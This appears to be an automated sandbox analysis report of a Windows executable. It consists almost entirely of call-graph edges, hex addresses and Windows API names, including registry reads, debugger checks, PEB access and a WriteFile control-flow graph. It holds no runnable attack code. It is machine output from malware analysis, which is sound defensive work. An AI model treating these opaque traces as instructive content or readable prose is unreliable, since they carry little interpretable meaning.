94234->94235 94235->94228 94237 1fd7f7 48 API calls 94236->94237 94238 1f287b 94237->94238 94239 1fd7f7 48 API calls 94238->94239 94240 1f2883 94239->94240 94241 1fd7f7 48 API calls 94240->94241 94242 1f285c 94241->94242 94242->94221 94243->94228 94244->94179 94246 1fd7f7 48 API calls 94245->94246 94247 1f26b0 94246->94247 94248 1fd7f7 48 API calls 94247->94248 94249 1f265f 94248->94249 94249->94187 94250->94215 94252 1fb7b1 94261 1fc62c 94252->94261 94254 1fb7ec 94271 1fba85 48 API calls _memcpy_s 94254->94271 94255 1fb7c2 94255->94254 94269 1fbc74 48 API calls 94255->94269 94258 1fb7e0 94270 1fba85 48 API calls _memcpy_s 94258->94270 94260 1fb6b7 Mailbox 94272 1fbcce 94261->94272 94263 2639fd 94278 2326bc 88 API calls 4 library calls 94263->94278 94265 263a0b 94266 1fc799 48 API calls 94268 1fc63b 94266->94268 94267 1fc68b 94267->94255 94268->94263 94268->94266 94268->94267 94269->94258 94270->94254 94271->94260 94273 1fbce8 94272->94273 94277 1fbcdb 94272->94277 94274 20f4ea 48 API calls 94273->94274 94275 1fbcf2 94274->94275 94276 20ee75 48 API calls 94275->94276 94276->94277 94277->94268 94278->94265 94279 1ff030 94282 203b70 94279->94282 94281 1ff03c 94285 203bc8 94282->94285 94333 2042a5 94282->94333 94283 203bef 94284 20f4ea 48 API calls 94283->94284 94286 203c18 94284->94286 94285->94283 94288 266f7e 94285->94288 94294 266fd1 94285->94294 94295 266f9b 94285->94295 94289 20f4ea 48 API calls 94286->94289 94288->94283 94290 266f87 94288->94290 94342 203c2c _memcpy_s __wsetenvp 94289->94342 94359 24d552 331 API calls Mailbox 94290->94359 94291 266fbe 94361 23cc5c 86 API calls 4 library calls 94291->94361 94362 24ceca 331 API calls Mailbox 94294->94362 94295->94291 94360 24da0e 331 API calls 2 library calls 94295->94360 94297 2042f2 94381 23cc5c 86 API calls 4 library calls 94297->94381 94299 2673b0 94299->94281 94300 267297 94370 23cc5c 86 API calls 4 library calls 94300->94370 94301 26737a 94380 23cc5c 86 API calls 4 library calls 94301->94380 94306 26707e 94363 23cc5c 86 API calls 4 library calls 94306->94363 94308 2040df 94371 23cc5c 86 API calls 4 library calls 94308->94371 94309 1fd6e9 55 API calls 94309->94342 94311 20dce0 53 API calls 94311->94342 94314 1fd645 53 API calls 94314->94342 94316 2672d2 94372 23cc5c 86 API calls 4 library calls 94316->94372 94318 1ffe30 331 API calls 94318->94342 94320 267350 94378 23cc5c 86 API calls 4 library calls 94320->94378 94321 2672e9 94373 23cc5c 86 API calls 4 library calls 94321->94373 94322 267363 94379 23cc5c 86 API calls 4 library calls 94322->94379 94326 1f6a63 48 API calls 94326->94342 94328 20c050 48 API calls 94328->94342 94329 26714c 94367 24ccdc 48 API calls 94329->94367 94331 203f2b 94331->94281 94332 26733f 94377 23cc5c 86 API calls 4 library calls 94332->94377 94374 23cc5c 86 API calls 4 library calls 94333->94374 94335 1fd286 48 API calls 94335->94342 94337 2671a1 94369 20c15c 48 API calls 94337->94369 94339 20ee75 48 API calls 94339->94342 94340 1f6eed 48 API calls 94340->94342 94342->94297 94342->94300 94342->94301 94342->94306 94342->94308 94342->94309 94342->94311 94342->94314 94342->94316 94342->94318 94342->94320 94342->94321 94342->94322 94342->94326 94342->94328 94342->94329 94342->94331 94342->94332 94342->94333 94342->94335 94342->94339 94342->94340 94344 2671e1 94342->94344 94350 20f4ea 48 API calls 94342->94350 94354 1fd9a0 53 API calls __cinit 94342->94354 94355 1fd83d 53 API calls 94342->94355 94356 1fcdb9 48 API calls 94342->94356 94357 20c15c 48 API calls 94342->94357 94358 20becb 331 API calls 94342->94358 94364 1fdcae 50 API calls Mailbox 94342->94364 94365 24ccdc 48 API calls 94342->94365 94366 23a1eb 50 API calls 94342->94366 94344->94331 94376 23cc5c 86 API calls 4 library calls 94344->94376 94346 26715f 94346->94337 94368 24ccdc 48 API calls 94346->94368 94347 2671ce 94348 20c050 48 API calls 94347->94348 94349 2671d6 94348->94349 94349->94344 94352 267313 94349->94352 94350->94342 94351 2671ab 94351->94333 94351->94347 94375 23cc5c 86 API calls 4 library calls 94352->94375 94354->94342 94355->94342 94356->94342 94357->94342 94358->94342 94359->94331 94360->94291 94361->94294 94362->94342 94363->94331 94364->94342 94365->94342 94366->94342 94367->94346 94368->94346 94369->94351 94370->94308 94371->94331 94372->94321 94373->94331 94374->94331 94375->94331 94376->94331 94377->94331 94378->94331 94379->94331 94380->94331 94381->94299 94382 e26ef8 94396 e24b48 94382->94396 94384 e26fab 94399 e26de8 94384->94399 94402 e27fd8 GetPEB 94396->94402 94398 e251d3 94398->94384 94400 e26df1 Sleep 94399->94400 94401 e26dff 94400->94401 94403 e28002 94402->94403 94403->94398 94404 2619dd 94409 1f4a30 94404->94409 94406 2619f1 94429 210f0a 52 API calls __cinit 94406->94429 94408 2619fb 94410 1f4a40 __ftell_nolock 94409->94410 94411 1fd7f7 48 API calls 94410->94411 94412 1f4af6 94411->94412 94430 1f5374 94412->94430 94414 1f4aff 94437 1f363c 94414->94437 94417 1f518c 48 API calls 94418 1f4b18 94417->94418 94443 1f64cf 94418->94443 94421 1fd7f7 48 API calls 94422 1f4b32 94421->94422 94449 1f49fb 94422->94449 94424 1f4b43 Mailbox 94424->94406 94425 1f61a6 48 API calls 94428 1f4b3d _wcscat Mailbox __wsetenvp 94425->94428 94426 1fce19 48 API calls 94426->94428 94427 1f64cf 48 API calls 94427->94428 94428->94424 94428->94425 94428->94426 94428->94427 94429->94408 94463 21f8a0 94430->94463 94433 1fce19 48 API calls 94434 1f53a7 94433->94434 94465 1f660f 94434->94465 94436 1f53b1 Mailbox 94436->94414 94438 1f3649 __ftell_nolock 94437->94438 94476 1f366c GetFullPathNameW 94438->94476 94440 1f365a 94441 1f6a63 48 API calls 94440->94441 94442 1f3669 94441->94442 94442->94417 94444 1f651b 94443->94444 94448 1f64dd _memcpy_s 94443->94448 94447 20f4ea 48 API calls 94444->94447 94445 20f4ea 48 API calls 94446 1f4b29 94445->94446 94446->94421 94447->94448 94448->94445 94450 1fbcce 48 API calls 94449->94450 94451 1f4a0a RegOpenKeyExW 94450->94451 94452 1f4a2b 94451->94452 94453 2641cc RegQueryValueExW 94451->94453 94452->94428 94454 264246 RegCloseKey 94453->94454 94455 2641e5 94453->94455 94456 20f4ea 48 API calls 94455->94456 94457 2641fe 94456->94457 94458 1f47b7 48 API calls 94457->94458 94459 264208 RegQueryValueExW 94458->94459 94460 264224 94459->94460 94461 26423b 94459->94461 94462 1f6a63 48 API calls 94460->94462 94461->94454 94462->94461 94464 1f5381 GetModuleFileNameW 94463->94464 94464->94433 94466 21f8a0 __ftell_nolock 94465->94466 94467 1f661c GetFullPathNameW 94466->94467 94468 1f6a63 48 API calls 94467->94468 94469 1f6643 94468->94469 94472 1f6571 94469->94472 94473 1f657f 94472->94473 94474 1fb18b 48 API calls 94473->94474 94475 1f658f 94474->94475 94475->94436 94477 1f368a 94476->94477 94477->94440 94478 2619ba 94483 20c75a 94478->94483 94482 2619c9 94484 1fd7f7 48 API calls 94483->94484 94485 20c7c8 94484->94485 94491 20d26c 94485->94491 94488 20c865 94489 20c881 94488->94489 94494 20d1fa 48 API calls _memcpy_s 94488->94494 94490 210f0a 52 API calls __cinit 94489->94490 94490->94482 94495 20d298 94491->94495 94494->94488 94496 20d28b 94495->94496 94497 20d2a5 94495->94497 94496->94488 94497->94496 94498 20d2ac RegOpenKeyExW 94497->94498 94498->94496 94499 20d2c6 RegQueryValueExW 94498->94499 94500 20d2e7 94499->94500 94501 20d2fc RegCloseKey 94499->94501 94500->94501 94501->94496 94502 215dfd 94503 215e09 __fcloseall 94502->94503 94539 217eeb GetStartupInfoW 94503->94539 94505 215e0e 94541 219ca7 GetProcessHeap 94505->94541 94507 215e66 94508 215e71 94507->94508 94626 215f4d 47 API calls 3 library calls 94507->94626 94542 217b47 94508->94542 94511 215e77 94512 215e82 __RTC_Initialize 94511->94512 94627 215f4d 47 API calls 3 library calls 94511->94627 94563 21acb3 94512->94563 94515 215e91 94516 215e9d GetCommandLineW 94515->94516 94628 215f4d 47 API calls 3 library calls 94515->94628 94582 222e7d GetEnvironmentStringsW 94516->94582 94519 215e9c 94519->94516 94523 215ec2 94595 222cb4 94523->94595 94526 215ec8 94527 215ed3 94526->94527 94630 21115b 47 API calls 3 library calls 94526->94630 94609 211195 94527->94609 94530 215edb 94531 215ee6 __wwincmdln 94530->94531 94631 21115b 47 API calls 3 library calls 94530->94631 94613 1f3a0f 94531->94613 94534 215efa 94535 215f09 94534->94535 94632 2113f1 47 API calls _doexit 94534->94632 94633 211186 47 API calls _doexit 94535->94633 94538 215f0e __fcloseall 94540 217f01 94539->94540 94540->94505 94541->94507 94634 21123a 30 API calls 2 library calls 94542->94634 94544 217b4c 94635 217e23 InitializeCriticalSectionAndSpinCount 94544->94635 94546 217b51 94547 217b55 94546->94547 94637 217e6d TlsAlloc 94546->94637 94636 217bbd 50 API calls 2 library calls 94547->94636 94550 217b5a 94550->94511 94551 217b67 94551->94547 94552 217b72 94551->94552 94638 216986 94552->94638 94555 217bb4 94646 217bbd 50 API calls 2 library calls 94555->94646 94558 217b93 94558->94555 94560 217b99 94558->94560 94559 217bb9 94559->94511 94645 217a94 47 API calls 4 library calls 94560->94645 94562 217ba1 GetCurrentThreadId 94562->94511 94564 21acbf __fcloseall 94563->94564 94565 217cf4 __lock 47 API calls 94564->94565 94566 21acc6 94565->94566 94567 216986 __calloc_crt 47 API calls 94566->94567 94568 21acd7 94567->94568 94569 21ad42 GetStartupInfoW 94568->94569 94570 21ace2 __fcloseall @_EH4_CallFilterFunc@8 94568->94570 94576 21ae80 94569->94576 94579 21ad57 94569->94579 94570->94515 94571 21af44 94655 21af58 LeaveCriticalSection _doexit 94571->94655 94573 21aec9 GetStdHandle 94573->94576 94574 216986 __calloc_crt 47 API calls 94574->94579 94575 21aedb GetFileType 94575->94576 94576->94571 94576->94573 94576->94575 94578 21af08 InitializeCriticalSectionAndSpinCount 94576->94578 94577 21ada5 94577->94576 94580 21ade5 InitializeCriticalSectionAndSpinCount 94577->94580 94581 21add7 GetFileType 94577->94581 94578->94576 94579->94574 94579->94576 94579->94577 94580->94577 94581->94577 94581->94580 94583 215ead 94582->94583 94585 222e8e 94582->94585 94589 222a7b GetModuleFileNameW 94583->94589 94584 222ea9 94656 2169d0 47 API calls __crtLCMapStringA_stat 94584->94656 94585->94584 94585->94585 94587 222eb4 _memcpy_s 94588 222eca FreeEnvironmentStringsW 94587->94588 94588->94583 94590 222aaf _wparse_cmdline 94589->94590 94591 215eb7 94590->94591 94592 222ae9 94590->94592 94591->94523 94629 21115b 47 API calls 3 library calls 94591->94629 94657 2169d0 47 API calls __crtLCMapStringA_stat 94592->94657 94594 222aef _wparse_cmdline 94594->94591 94596 222ccd __wsetenvp 94595->94596 94600 222cc5 94595->94600 94597 216986 __calloc_crt 47 API calls 94596->94597 94605 222cf6 __wsetenvp 94597->94605 94598 222d4d 94599 211c9d _free 47 API calls 94598->94599 94599->94600 94600->94526 94601 216986 __calloc_crt 47 API calls 94601->94605 94602 222d72 94603 211c9d _free 47 API calls 94602->94603 94603->94600 94605->94598 94605->94600 94605->94601 94605->94602 94606 222d89 94605->94606 94658 222567 47 API calls _memcpy_s 94605->94658 94659 216e20 IsProcessorFeaturePresent 94606->94659 94608 222d95 94608->94526 94610 2111a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94609->94610 94612 2111e0 __IsNonwritableInCurrentImage 94610->94612 94674 210f0a 52 API calls __cinit 94610->94674 94612->94530 94614 1f3a29 94613->94614 94615 261ebf 94613->94615 94616 1f3a63 IsThemeActive 94614->94616 94675 211405 94616->94675 94620 1f3a8f 94687 1f3adb SystemParametersInfoW SystemParametersInfoW 94620->94687 94622 1f3a9b 94688 1f3d19 94622->94688 94624 1f3aa3 SystemParametersInfoW 94625 1f3ac8 94624->94625 94625->94534 94626->94508 94627->94512 94628->94519 94632->94535 94633->94538 94634->94544 94635->94546 94636->94550 94637->94551 94640 21698d 94638->94640 94641 2169ca 94640->94641 94642 2169ab Sleep 94640->94642 94647 2230aa 94640->94647 94641->94555 94644 217ec9 TlsSetValue 94641->94644 94643 2169c2 94642->94643 94643->94640 94643->94641 94644->94558 94645->94562 94646->94559 94648 2230b5 94647->94648 94652 2230d0 __calloc_impl 94647->94652 94649 2230c1 94648->94649 94648->94652 94654 217c0e 47 API calls __getptd_noexit 94649->94654 94651 2230e0 HeapAlloc 94651->94652 94653 2230c6 94651->94653 94652->94651 94652->94653 94653->94640 94654->94653 94655->94570 94656->94587 94657->94594 94658->94605 94660 216e2b 94659->94660 94665 216cb5 94660->94665 94664 216e46 94664->94608 94666 216ccf _memset ___raise_securityfailure 94665->94666 94667 216cef IsDebuggerPresent 94666->94667 94673 2181ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94667->94673 94669 21a70c __ftell_nolock 6 API calls 94671 216dd6 94669->94671 94670 216db3 ___raise_securityfailure 94670->94669 94672 218197 GetCurrentProcess TerminateProcess 94671->94672 94672->94664 94673->94670 94674->94612 94676 217cf4 __lock 47 API calls 94675->94676 94677 211410 94676->94677 94740 217e58 LeaveCriticalSection 94677->94740 94679 1f3a88 94680 21146d 94679->94680 94681 211491 94680->94681 94682 211477 94680->94682 94681->94620 94682->94681 94741 217c0e 47 API calls __getptd_noexit 94682->94741 94684 211481 94742 216e10 8 API calls _memcpy_s 94684->94742 94686 21148c 94686->94620 94687->94622 94689 1f3d26 __ftell_nolock 94688->94689 94690 1fd7f7 48 API calls 94689->94690 94691 1f3d31 GetCurrentDirectoryW 94690->94691 94743 1f61ca 94691->94743 94693 1f3d57 IsDebuggerPresent 94694 261cc1 MessageBoxA 94693->94694 94695 1f3d65 94693->94695 94697 261cd9 94694->94697 94695->94697 94698 1f3d82 94695->94698 94730 1f3e3a 94695->94730 94696 1f3e41 SetCurrentDirectoryW 94701 1f3e4e Mailbox 94696->94701 94868 20c682 48 API calls 94697->94868 94817 1f40e5 94698->94817 94701->94624 94702 261ce9 94707 261cff SetCurrentDirectoryW 94702->94707 94707->94701 94730->94696 94740->94679 94741->94684 94742->94686 94870 20e99b 94743->94870 94747 1f61eb 94748 1f5374 50 API calls 94747->94748 94749 1f61ff 94748->94749 94750 1fce19 48 API calls 94749->94750 94751 1f620c 94750->94751 94887 1f39db 94751->94887 94753 1f6216 Mailbox 94754 1f6eed 48 API calls 94753->94754 94755 1f622b 94754->94755 94899 1f9048 94755->94899 94758 1fce19 48 API calls 94759 1f6244 94758->94759 94760 1fd6e9 55 API calls 94759->94760 94761 1f6254 Mailbox 94760->94761 94762 1fce19 48 API calls 94761->94762 94763 1f627c 94762->94763 94764 1fd6e9 55 API calls 94763->94764 94765 1f628f Mailbox 94764->94765 94766 1fce19 48 API calls 94765->94766 94767 1f62a0 94766->94767 94768 1fd645 53 API calls 94767->94768 94769 1f62b2 Mailbox 94768->94769 94770 1fd7f7 48 API calls 94769->94770 94771 1f62c5 94770->94771 94902 1f63fc 94771->94902 94775 1f62df 94776 1f62e9 94775->94776 94777 261c08 94775->94777 94779 210fa7 _W_store_winword 59 API calls 94776->94779 94778 1f63fc 48 API calls 94777->94778 94780 261c1c 94778->94780 94781 1f62f4 94779->94781 94783 1f63fc 48 API calls 94780->94783 94781->94780 94782 1f62fe 94781->94782 94784 210fa7 _W_store_winword 59 API calls 94782->94784 94785 261c38 94783->94785 94786 1f6309 94784->94786 94788 1f5374 50 API calls 94785->94788 94786->94785 94787 1f6313 94786->94787 94789 210fa7 _W_store_winword 59 API calls 94787->94789 94791 261c5d 94788->94791 94790 1f631e 94789->94790 94792 1f635f 94790->94792 94794 261c86 94790->94794 94797 1f63fc 48 API calls 94790->94797 94793 1f63fc 48 API calls 94791->94793 94792->94794 94795 1f636c 94792->94795 94796 261c69 94793->94796 94798 1f6eed 48 API calls 94794->94798 94802 20c050 48 API calls 94795->94802 94799 1f6eed 48 API calls 94796->94799 94800 1f6342 94797->94800 94801 261ca8 94798->94801 94803 261c77 94799->94803 94804 1f6eed 48 API calls 94800->94804 94805 1f63fc 48 API calls 94801->94805 94806 1f6384 94802->94806 94807 1f63fc 48 API calls 94803->94807 94808 1f6350 94804->94808 94809 261cb5 94805->94809 94810 201b90 48 API calls 94806->94810 94807->94794 94811 1f63fc 48 API calls 94808->94811 94809->94809 94814 1f6394 94810->94814 94811->94792 94812 201b90 48 API calls 94812->94814 94814->94812 94815 1f63fc 48 API calls 94814->94815 94816 1f63d6 Mailbox 94814->94816 94918 1f6b68 48 API calls 94814->94918 94815->94814 94816->94693 94818 1f40f2 __ftell_nolock 94817->94818 94819 1f410b 94818->94819 94820 26370e _memset 94818->94820 94821 1f660f 49 API calls 94819->94821 94822 26372a GetOpenFileNameW 94820->94822 94823 1f4114 94821->94823 94824 263779 94822->94824 94960 1f40a7 94823->94960 94826 1f6a63 48 API calls 94824->94826 94828 26378e 94826->94828 94828->94828 94830 1f4129 94978 1f4139 94830->94978 94868->94702 94871 1fd7f7 48 API calls 94870->94871 94872 1f61db 94871->94872 94873 1f6009 94872->94873 94874 1f6016 __ftell_nolock 94873->94874 94875 1f6a63 48 API calls 94874->94875 94880 1f617c Mailbox 94874->94880 94877 1f6048 94875->94877 94883 1f607e Mailbox 94877->94883 94919 1f61a6 94877->94919 94878 1f614f 94879 1fce19 48 API calls 94878->94879 94878->94880 94882 1f6170 94879->94882 94880->94747 94881 1fce19 48 API calls 94881->94883 94884 1f64cf 48 API calls 94882->94884 94883->94878 94883->94880 94883->94881 94885 1f64cf 48 API calls 94883->94885 94886 1f61a6 48 API calls 94883->94886 94884->94880 94885->94883 94886->94883 94888 1f41a9 136 API calls 94887->94888 94889 1f39fe 94888->94889 94890 1f3a06 94889->94890 94922 23c396 94889->94922 94890->94753 94892 262ff0 94894 211c9d _free 47 API calls 94892->94894 94896 262ffd 94894->94896 94895 1f4252 84 API calls 94895->94892 94897 1f4252 84 API calls 94896->94897 94898 263006 94897->94898 94898->94898 94900 20f4ea 48 API calls 94899->94900 94901 1f6237 94900->94901 94901->94758 94903 1f641f 94902->94903 94904 1f6406 94902->94904 94905 1f6a63 48 API calls 94903->94905 94906 1f6eed 48 API calls 94904->94906 94907 1f62d1 94905->94907 94906->94907 94908 210fa7 94907->94908 94909 210fb3 94908->94909 94910 211028 94908->94910 94917 210fd8 94909->94917 94957 217c0e 47 API calls __getptd_noexit 94909->94957 94959 21103a 59 API calls 3 library calls 94910->94959 94913 211035 94913->94775 94914 210fbf 94958 216e10 8 API calls _memcpy_s 94914->94958 94916 210fca 94916->94775 94917->94775 94918->94814 94920 1fbdfa 48 API calls 94919->94920 94921 1f61b1 94920->94921 94921->94877 94923 1f4517 83 API calls 94922->94923 94924 23c405 94923->94924 94925 23c56d 94 API calls 94924->94925 94926 23c417 94925->94926 94927 1f44ed 64 API calls 94926->94927 94953 23c41b 94926->94953 94928 23c432 94927->94928 94929 1f44ed 64 API calls 94928->94929 94930 23c442 94929->94930 94931 1f44ed 64 API calls 94930->94931 94932 23c45d 94931->94932 94933 1f44ed 64 API calls 94932->94933 94934 23c478 94933->94934 94935 1f4517 83 API calls 94934->94935 94936 23c48f 94935->94936 94937 21395c __crtLCMapStringA_stat 47 API calls 94936->94937 94938 23c496 94937->94938 94939 21395c __crtLCMapStringA_stat 47 API calls 94938->94939 94940 23c4a0 94939->94940 94941 1f44ed 64 API calls 94940->94941 94942 23c4b4 94941->94942 94943 23bf5a GetSystemTimeAsFileTime 94942->94943 94944 23c4c7 94943->94944 94945 23c4f1 94944->94945 94946 23c4dc 94944->94946 94948 23c4f7 94945->94948 94949 23c556 94945->94949 94947 211c9d _free 47 API calls 94946->94947 94951 23c4e2 94947->94951 94952 23b965 118 API calls 94948->94952 94950 211c9d _free 47 API calls 94949->94950 94950->94953 94954 211c9d _free 47 API calls 94951->94954 94955 23c54e 94952->94955 94953->94892 94953->94895 94954->94953 94956 211c9d _free 47 API calls 94955->94956 94956->94953 94957->94914 94958->94916 94959->94913 94961 21f8a0 __ftell_nolock 94960->94961 94962 1f40b4 GetLongPathNameW 94961->94962 94963 1f6a63 48 API calls 94962->94963 94964 1f40dc 94963->94964 94965 1f49a0 94964->94965 94966 1fd7f7 48 API calls 94965->94966 94967 1f49b2 94966->94967 94968 1f660f 49 API calls 94967->94968 94969 1f49bd 94968->94969 94970 1f49c8 94969->94970 94976 262e35 94969->94976 94971 1f64cf 48 API calls 94970->94971 94973 1f49d4 94971->94973 95012 1f28a6 94973->95012 94975 262e4f 94976->94975 95018 20d35e 60 API calls 94976->95018 94977 1f49e7 Mailbox 94977->94830 94979 1f41a9 136 API calls 94978->94979 94980 1f415e 94979->94980 94981 263489 94980->94981 94982 1f41a9 136 API calls 94980->94982 94983 23c396 122 API calls 94981->94983 95013 1f28b8 95012->95013 95017 1f28d7 _memcpy_s 95012->95017 95015 20f4ea 48 API calls 95013->95015 95014 20f4ea 48 API calls 95016 1f28ee 95014->95016 95015->95017 95016->94977 95017->95014 95018->94976 95196 1f3742 95197 1f374b 95196->95197 95198 1f3769 95197->95198 95199 1f37c8 95197->95199 95236 1f37c6 95197->95236 95200 1f382c PostQuitMessage 95198->95200 95201 1f3776 95198->95201 95203 1f37ce 95199->95203 95204 261e00 95199->95204 95228 1f37b9 95200->95228 95206 261e88 95201->95206 95207 1f3781 95201->95207 95202 1f37ab DefWindowProcW 95202->95228 95208 1f37f6 SetTimer RegisterWindowMessageW 95203->95208 95209 1f37d3 95203->95209 95251 1f2ff6 16 API calls 95204->95251 95256 234ddd 60 API calls _memset 95206->95256 95211 1f3789 95207->95211 95212 1f3836 95207->95212 95213 1f381f CreatePopupMenu 95208->95213 95208->95228 95215 261da3 95209->95215 95216 1f37da KillTimer 95209->95216 95210 261e27 95252 20e312 331 API calls Mailbox 95210->95252 95219 261e6d 95211->95219 95220 1f3794 95211->95220 95241 20eb83 95212->95241 95213->95228 95222 261ddc MoveWindow 95215->95222 95223 261da8 95215->95223 95248 1f3847 Shell_NotifyIconW _memset 95216->95248 95219->95202 95255 22a5f3 48 API calls 95219->95255 95225 1f379f 95220->95225 95226 261e58 95220->95226 95222->95228 95229 261dac 95223->95229 95230 261dcb SetFocus 95223->95230 95224 1f37ed 95249 1f390f DeleteObject DestroyWindow Mailbox 95224->95249 95225->95202 95253 1f3847 Shell_NotifyIconW _memset 95225->95253 95254 2355bd 70 API calls _memset 95226->95254 95227 261e9a 95227->95202 95227->95228 95229->95225 95233 261db5 95229->95233 95230->95228 95250 1f2ff6 16 API calls 95233->95250 95235 261e68 95235->95228 95236->95202 95239 261e4c 95240 1f4ffc 67 API calls 95239->95240 95240->95236 95242 20eb9a _memset 95241->95242 95243 20ec1c 95241->95243 95244 1f51af 50 API calls 95242->95244 95243->95228 95246 20ebc1 95244->95246 95245 20ec05 KillTimer SetTimer 95245->95243 95246->95245 95247 263c7a Shell_NotifyIconW 95246->95247 95247->95245 95248->95224 95249->95228 95250->95228 95251->95210 95252->95225 95253->95239 95254->95235 95255->95236 95256->95227 95257 26197b 95262 20dd94 95257->95262 95261 26198a 95263 20f4ea 48 API calls 95262->95263 95264 20dd9c 95263->95264 95265 20ddb0 95264->95265 95270 20df3d 95264->95270 95269 210f0a 52 API calls __cinit 95265->95269 95269->95261 95271 20df46 95270->95271 95272 20dda8 95270->95272 95302 210f0a 52 API calls __cinit 95271->95302 95274 20ddc0 95272->95274 95275 1fd7f7 48 API calls 95274->95275 95276 20ddd7 GetVersionExW 95275->95276 95277 1f6a63 48 API calls 95276->95277 95278 20de1a 95277->95278 95303 20dfb4 95278->95303 95281 1f6571 48 API calls 95285 20de2e 95281->95285 95282 2624c8 95285->95282 95307 20df77 95285->95307 95286 20dea4 GetCurrentProcess 95316 20df5f LoadLibraryA GetProcAddress 95286->95316 95287 20debb 95288 20df31 GetSystemInfo 95287->95288 95289 20dee3 95287->95289 95291 20df0e 95288->95291 95310 20e00c 95289->95310 95294 20df21 95291->95294 95295 20df1c FreeLibrary 95291->95295 95294->95265 95295->95294 95296 20df29 GetSystemInfo 95298 20df03 95296->95298 95297 20def9 95313 20dff4 95297->95313 95298->95291 95301 20df09 FreeLibrary 95298->95301 95301->95291 95302->95272 95304 20dfbd 95303->95304 95305 1fb18b 48 API calls 95304->95305 95306 20de22 95305->95306 95306->95281 95317 20df89 95307->95317 95321 20e01e 95310->95321 95314 20e00c 2 API calls 95313->95314 95315 20df01 GetNativeSystemInfo 95314->95315 95315->95298 95316->95287 95318 20dea0 95317->95318 95319 20df92 LoadLibraryA 95317->95319 95318->95286 95318->95287 95319->95318 95320 20dfa3 GetProcAddress 95319->95320 95320->95318 95322 20def1 95321->95322 95323 20e027 LoadLibraryA 95321->95323 95322->95296 95322->95297 95323->95322 95324 20e038 GetProcAddress 95323->95324 95324->95322 95325 268eb8 95329 23a635 95325->95329 95327 268ec3 95328 23a635 84 API calls 95327->95328 95328->95327 95330 23a66f 95329->95330 95334 23a642 95329->95334 95330->95327 95331 23a671 95341 20ec4e 81 API calls 95331->95341 95332 23a676 95335 1f936c 81 API calls 95332->95335 95334->95330 95334->95331 95334->95332 95338 23a669 95334->95338 95336 23a67d 95335->95336 95337 1f510d 48 API calls 95336->95337 95337->95330 95340 204525 61 API calls _memcpy_s 95338->95340 95340->95330 95341->95332 95342 1fef80 95343 203b70 331 API calls 95342->95343 95344 1fef8c 95343->95344

                                                              Executed Functions

                                                              Function 0021B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 744 21b043-21b080 call 21f8a0 747 21b082-21b084 744->747 748 21b089-21b08b 744->748 749 21b860-21b86c call 21a70c 747->749 750 21b08d-21b0a7 call 217bda call 217c0e call 216e10 748->750 751 21b0ac-21b0d9 748->751 750->749 754 21b0e0-21b0e7 751->754 755 21b0db-21b0de 751->755 757 21b105 754->757 758 21b0e9-21b100 call 217bda call 217c0e call 216e10 754->758 755->754 756 21b10b-21b110 755->756 762 21b112-21b11c call 21f82f 756->762 763 21b11f-21b12d call 223bf2 756->763 757->756 790 21b851-21b854 758->790 762->763 773 21b133-21b145 763->773 774 21b44b-21b45d 763->774 773->774 777 21b14b-21b183 call 217a0d GetConsoleMode 773->777 778 21b463-21b473 774->778 779 21b7b8-21b7d5 WriteFile 774->779 777->774 796 21b189-21b18f 777->796 782 21b479-21b484 778->782 783 21b55a-21b55f 778->783 785 21b7e1-21b7e7 GetLastError 779->785 786 21b7d7-21b7df 779->786 788 21b81b-21b833 782->788 789 21b48a-21b49a 782->789 792 21b663-21b66e 783->792 793 21b565-21b56e 783->793 791 21b7e9 785->791 786->791 798 21b835-21b838 788->798 799 21b83e-21b84e call 217c0e call 217bda 788->799 797 21b4a0-21b4a3 789->797 795 21b85e-21b85f 790->795 801 21b7ef-21b7f1 791->801 792->788 800 21b674 792->800 793->788 794 21b574 793->794 802 21b57e-21b595 794->802 795->749 803 21b191-21b193 796->803 804 21b199-21b1bc GetConsoleCP 796->804 805 21b4a5-21b4be 797->805 806 21b4e9-21b520 WriteFile 797->806 798->799 807 21b83a-21b83c 798->807 799->790 808 21b67e-21b693 800->808 810 21b7f3-21b7f5 801->810 811 21b856-21b85c 801->811 813 21b59b-21b59e 802->813 803->774 803->804 814 21b440-21b446 804->814 815 21b1c2-21b1ca 804->815 816 21b4c0-21b4ca 805->816 817 21b4cb-21b4e7 805->817 806->785 818 21b526-21b538 806->818 807->795 819 21b699-21b69b 808->819 810->788 812 21b7f7-21b7fc 810->812 811->795 821 21b812-21b819 call 217bed 812->821 822 21b7fe-21b810 call 217c0e call 217bda 812->822 823 21b5a0-21b5b6 813->823 824 21b5de-21b627 WriteFile 813->824 814->810 825 21b1d4-21b1d6 815->825 816->817 817->797 817->806 818->801 826 21b53e-21b54f 818->826 827 21b6d8-21b719 WideCharToMultiByte 819->827 828 21b69d-21b6b3 819->828 821->790 822->790 833 21b5b8-21b5ca 823->833 834 21b5cd-21b5dc 823->834 824->785 836 21b62d-21b645 824->836 837 21b36b-21b36e 825->837 838 21b1dc-21b1fe 825->838 826->789 839 21b555 826->839 827->785 832 21b71f-21b721 827->832 840 21b6b5-21b6c4 828->840 841 21b6c7-21b6d6 828->841 845 21b727-21b75a WriteFile 832->845 833->834 834->813 834->824 836->801 847 21b64b-21b658 836->847 842 21b370-21b373 837->842 843 21b375-21b3a2 837->843 848 21b200-21b215 838->848 849 21b217-21b223 call 211688 838->849 839->801 840->841 841->819 841->827 842->843 850 21b3a8-21b3ab 842->850 843->850 852 21b77a-21b78e GetLastError 845->852 853 21b75c-21b776 845->853 847->802 854 21b65e 847->854 855 21b271-21b283 call 2240f7 848->855 868 21b225-21b239 849->868 869 21b269-21b26b 849->869 857 21b3b2-21b3c5 call 225884 850->857 858 21b3ad-21b3b0 850->858 862 21b794-21b796 852->862 853->845 860 21b778 853->860 854->801 871 21b435-21b43b 855->871 872 21b289 855->872 857->785 878 21b3cb-21b3d5 857->878 858->857 864 21b407-21b40a 858->864 860->862 862->791 867 21b798-21b7b0 862->867 864->825 874 21b410 864->874 867->808 873 21b7b6 867->873 875 21b412-21b42d 868->875 876 21b23f-21b254 call 2240f7 868->876 869->855 871->791 879 21b28f-21b2c4 WideCharToMultiByte 872->879 873->801 874->871 875->871 876->871 884 21b25a-21b267 876->884 881 21b3d7-21b3ee call 225884 878->881 882 21b3fb-21b401 878->882 879->871 883 21b2ca-21b2f0 WriteFile 879->883 881->785 889 21b3f4-21b3f5 881->889 882->864 883->785 886 21b2f6-21b30e 883->886 884->879 886->871 